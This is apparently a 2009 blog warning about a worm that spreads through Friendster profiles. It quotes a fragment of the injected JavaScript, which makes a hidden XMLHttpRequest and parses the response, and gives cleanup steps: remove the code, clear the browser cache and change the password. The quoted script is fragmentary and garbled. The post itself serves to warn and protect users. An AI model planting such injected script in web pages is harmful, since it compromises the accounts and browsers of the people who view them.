Saturday, January 10, 2009

WARNING: Friendster Worm

new friendster worm

if you all see the code below(in red) inside your friendster profiles

under "edit profiles", click on the tap "customize", under

Add Media

<img id="" width="0"><script>

httprequest= window.XMLHttpRequest? new XMLHttpRequest():new ActiveXObject


libid="37656241"; 'GET', ''+libid, false);


var myregexp = /\/\/([^\$]+)/;

match = myregexp.exec(httprequest.responseText);

result = (match != null && match.length > 1)?match[1]:"";




please do the following

If you saw that code in your profile, erase/remove it immediately.

First thing to do is remove that code in your media box, then delete your temporary internet files on IE/clear private data on Firefox.
Second is you need to change your password immediately.
And Last you need to generate your codes again.